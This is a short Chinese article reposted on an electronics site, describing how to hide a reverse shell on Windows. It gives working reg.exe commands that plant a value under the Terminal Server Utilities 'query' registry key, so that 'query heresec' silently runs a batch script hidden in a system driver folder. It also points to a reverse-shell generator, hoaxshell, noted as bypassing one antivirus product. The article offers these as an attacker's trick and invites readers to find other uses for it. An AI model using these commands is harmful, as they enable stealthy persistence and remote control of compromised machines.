用一条命令来隐藏反向Shell-电子发烧友网

用一条命令来隐藏反向Shell

From：https://www.youtube.com/watch?v=gzv3d7rvjKA

注册表路径：

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerUtilitiesquery

包含了与终端服务器相关的设置和配置信息。

执行命令query可以查看服务器的一些状态，实际上是执行此项值中的可执行文件。

添加一条，打开计算器。

reg.exe add "HKLMSYSTEMCurrentControlSetControlTerminal ServerUtilitiesquery" /v heresec /t REG_MULTI_SZ /d 01hereseccalc.exe

这里再介绍一个能够绕过一些AV的Windows反向shell生成器和交互程序。（测试环境用的X绒，可以绕过，经测试不能绕过Windows Defender的AMSI）。

https://github.com/t3l3machus/hoaxshell

将命令写入一个bat脚本中，然后添加注册表后执行。

reg.exe add "HKLMSYSTEMCurrentControlSetControlTerminal ServerUtilitiesquery" /v heresec /t REG_MULTI_SZ /d 01heresecC:WindowsSystem32spooldriverscolor1.bat query heresec

只需执行命令query heresec即可运行反弹shell脚本。

还能怎么用，再联想一下。

声明：本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人，不代表电子发烧友网立场。文章及其配图仅供工程师学习之用，如有内容侵权或者其他违规问题，请联系本站处理。举报投诉

服务器

服务器

+关注

关注
12

文章
9212

浏览量
85568
Shell

Shell

+关注

关注
1

文章
366

浏览量
23404

原文标题：小技巧 | 用一条命令来隐藏反向Shell

文章出处：【微信号：菜鸟学信安，微信公众号：菜鸟学信安】欢迎添加关注！文章转载请注明出处。

Linux实现简易的Shell命令行解释器

来制作一个简易的 [Shell 命令]行解释器。

发表于 03-30 10:00 •1803次阅读

基于Go语言的反弹Shell命令生成工具简介

RevShell 是一个基于Go语言的反弹Shell命令生成工具，旨在帮助安全研究人员和渗透测试人员在需要与目标主机建立反向连接时快速生成相应的Sh

发表于 08-25 09:45 •774次阅读

Linux Shell系列教程之Shell简介和类型

（Interactive）：解释执行用户的命令，用户输入一条命令，Shell就解释执行一条。批处理（Batch）：用户事先写

发表于 08-28 13:56

linux shell命令/unix shell命令教程

linux shell命令/unix shell命令教程:为了防止未授权用户访问你的文件，可以在文件和目录上设置权限位。还可以设定文件在创建时所具有的缺省权限：这些只是整个系统安全问题

发表于 12-06 13:08 •61次下载

Shell内建命令：exit命令

1.简介 exit 命令是 Shell 内建命令，用于退出当前 Shell 进程。 2.命令格式 exit N （1）状态码 N 的范围是

发表于 02-02 10:45 •4007次阅读

Shell命令编程实践指南

‍‍我们在第一次作为运维人员去学习和写shell脚本的时候，我们经常会做什么，我们把我们在‍‍ Linux上面去执行的那些命令，我们一股脑的全部把它丢到

发表于 08-19 13:10 •1220次阅读

Shell命令行解释器简介

Shell 是一个命令行解释器，Shell 为用户提供了与设备进行命令行交互的方式，用户通过串口、以太网、无线等方式将

发表于 08-19 17:20 •3237次阅读

shell脚本本身自带的命令详解

除了以文件形式保存在/usr/bin下面的命令，shell脚本中还可以使用shell本身自带的命令，即内置命令

发表于 05-23 09:32 •1047次阅读

Kiuwan：如何防止反向Shell攻击

员工收到一封电子邮件，其中包含附件或链接。然后他们单击附件或链接并立即将一些恶意软件下载到他们的计算机上。这就是攻击者获得反向 shell 连接的方式。然后攻击者可以在机器上执行

发表于 07-09 10:57 •941次阅读

shell脚本基本命令

Shell脚本是一种可执行文件，它包含了一组用某种特定语言编写的命令，这些命令可以被解释器（如b

发表于 11-08 10:08 •2178次阅读

shell命令和linux命令一样吗

Shell命令和Linux命令并不完全一样。首先，Shell是一种

发表于 11-08 10:51 •2898次阅读

linux命令和shell编程有什么联系

Linux命令和Shell编程之间存在密切的联系。首先，Shell是Linux命令行下的解释器，它提供了一个用户界面，使用户能够与Linu

发表于 11-08 10:53 •940次阅读

linux命令行与shell编程实战

Linux命令行与Shell编程实战主要涉及以下内容： Linux命令行基础：学习Linux命令行的基本操作，如文件管理、进程管理、网络配置等。熟悉使用

发表于 11-08 10:57 •788次阅读

python shell怎么用

Python Shell的使用方法、功能和一些常见的操作技巧。 Python Shell的启动： Python Shell可以通过在命令行中

发表于 11-29 14:36 •1184次阅读

shell具有的功能和特点

Shell 是一个命令行解释器，用于与操作系统进行交互。它提供了一种方便的方式来执行命令、管理文

发表于 08-30 14:48 •559次阅读

搜索历史

用一条命令来隐藏反向Shell

评论

Linux实现简易的Shell命令行解释器

基于Go语言的反弹Shell命令生成工具简介

Linux Shell系列教程之Shell简介和类型

linux shell命令/unix shell命令教程

Shell内建命令：exit命令

Shell命令编程实践指南

Shell命令行解释器简介

shell脚本本身自带的命令详解

Kiuwan：如何防止反向Shell攻击

shell脚本基本命令

shell命令和linux命令一样吗

linux命令和shell编程有什么联系

linux命令行与shell编程实战

python shell怎么用

shell具有的功能和特点